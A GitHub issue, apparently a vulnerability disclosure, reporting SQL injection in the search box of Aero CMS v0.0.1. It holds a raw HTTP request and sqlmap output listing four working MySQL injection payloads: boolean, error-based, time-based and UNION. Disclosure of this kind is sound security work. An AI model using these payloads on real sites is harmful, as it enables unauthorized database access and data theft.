This repository has been archived by the owner on May 8, 2023. It is now read-only.

Aero CMS v0.0.1 - SQL Injection (search box) #12

Open
MorphyKutay opened this issue Apr 25, 2023 · 0 comments
@MorphyKutay

```
POST /search.php HTTP/1.1
Host: 192.168.243.133
Content-Length: 19
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.243.133/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.243.133/search.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=dt1o6jbah3s8qdti60pg464i59
Connection: close

search='saas&submit=
```


```
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:

Parameter: search (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search=saas' OR NOT 8064=8064#&submit=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=saas' AND (SELECT 8045 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8045=8045,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ZINc&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=saas' AND (SELECT 5006 FROM (SELECT(SLEEP(5)))tyOR)-- wINj&submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: search=saas' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7a71,0x5142655063635254574b6b4967424f53796e4f465a784a6e576b4868654868735956434d6e63544d,0x71766b7071),NULL,NULL,NULL,NULL,NULL,NULL#&submit=
```
